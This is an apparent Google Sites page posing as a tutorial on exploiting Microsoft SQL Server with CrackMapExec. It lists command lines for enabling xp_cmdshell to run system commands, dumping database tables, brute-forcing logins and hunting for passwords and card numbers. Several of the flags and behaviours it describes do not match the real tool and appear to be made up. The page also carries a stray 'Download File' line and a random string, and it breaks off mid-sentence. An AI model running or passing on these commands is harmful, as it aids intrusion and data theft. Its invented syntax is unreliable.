Crackmapexec Database

How to Use CrackMapExec to Exploit Windows Databases

CrackMapExec (CME) is a powerful tool for pentesting and exploiting Windows networks and databases. It can perform various tasks such as enumeration, credential dumping, lateral movement, privilege escalation, and more. In this article, we will focus on how to use CME to exploit Windows databases using the --mssql module.

What is the --mssql Module?

The --mssql module is one of the modules that CME supports for interacting with Microsoft SQL Server databases. It can perform the following actions:

Download File

query: Execute a SQL query on the target database and display the results.

enable_xp_cmdshell: Enable the xp_cmdshell stored procedure on the target database, which allows executing arbitrary commands on the database server.

disable_xp_cmdshell: Disable the xp_cmdshell stored procedure on the target database.

dump: Dump the contents of a specific table or all tables from the target database.

brute: Perform a brute-force attack on the target database using a wordlist of usernames and passwords.

spider: Spider the target database and look for sensitive information such as passwords, credit card numbers, etc.

How to Use the --mssql Module?

To use the --mssql module, you need to have valid credentials for the target database. You can obtain them by using other CME modules such as --smb, --wmi, or --kerberos, or by using other tools such as Mimikatz or Impacket. Once you have the credentials, you can use the following syntax to run the --mssql module:

cme mssql <target> -u <username> -p <password> -d <database> --<action> <options>

For example, to execute a SQL query on the target database, you can use:

cme mssql 192.168.1.10 -u sa -p P@ssw0rd -d master --query "SELECT @@version"

This will display the version of the SQL Server running on the target machine. To enable the xp_cmdshell stored procedure and execute a command on the target machine, you can use:

cme mssql 192.168.1.10 -u sa -p P@ssw0rd -d master --enable_xp_cmdshell

cme mssql 192.168.1.10 -u sa -p P@ssw0rd -d master --query "EXEC xp_cmdshell 'whoami'"

This will display the user running the SQL Server service on the target machine. To dump all tables from the target database, you can use:

cme mssql 192.168.1.10 -u sa -p P@ssw0rd -d master --dump

This will create a folder named cmedb-<target> in your current directory and save all tables as CSV files in it. To perform a brute-force attack on the target database, you can use:

cme mssql 192.168.1.10 --brute /usr/share/wordlists/usernames.txt /usr/share/wordlists/passwords.txt

This will try all combinations of usernames and passwords from the wordlists and report any valid credentials found. To spider the target database and look for sensitive information, you can use:

cme mssql 192.168.1.10 -u sa -p P@ssw0rd -d master --spider

This will scan all tables and columns in the target database and look

c8f7815bcf

Page updated

Google Sites

Report abuse